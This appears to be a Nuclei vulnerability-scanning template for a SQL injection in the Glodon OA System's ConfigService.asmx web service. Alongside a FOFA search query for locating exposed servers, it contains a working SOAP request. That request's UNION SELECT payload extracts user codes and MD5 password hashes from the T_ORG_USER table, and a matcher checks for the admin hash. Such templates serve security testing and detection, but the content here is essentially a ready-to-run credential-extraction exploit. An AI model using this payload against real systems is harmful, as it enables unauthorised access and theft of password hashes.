id: glodon-oa-configservice-sqli

info:
  name: Glodon OA System ConfigService.asmx SQL Injection
  author: Co5mos
  severity: critical
  description: |
    Glodon OA System's `ConfigService.asmx` endpoint has a SQL injection vulnerability that allows attackers to retrieve sensitive information from the database.
  metadata:
    verified: true
    fofa-query: 'header="Services/Identification/login.ashx" || banner="Services/Identification/login.ashx"'
  tags: glodon, sqli

http:
  - raw:
      - |
        POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml;charset=UTF-8

        <?xml version="1.0" encoding="utf-8"?>
        <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
        <soap:Body>
        <GetIMDictionary xmlns="http://tempuri.org/">
        <key>1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --</key>
        </GetIMDictionary>
        </soap:Body>
        </soap:Envelope>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "value=\"admin:(\\w{32})\""

      - type: status
        status:
          - 200
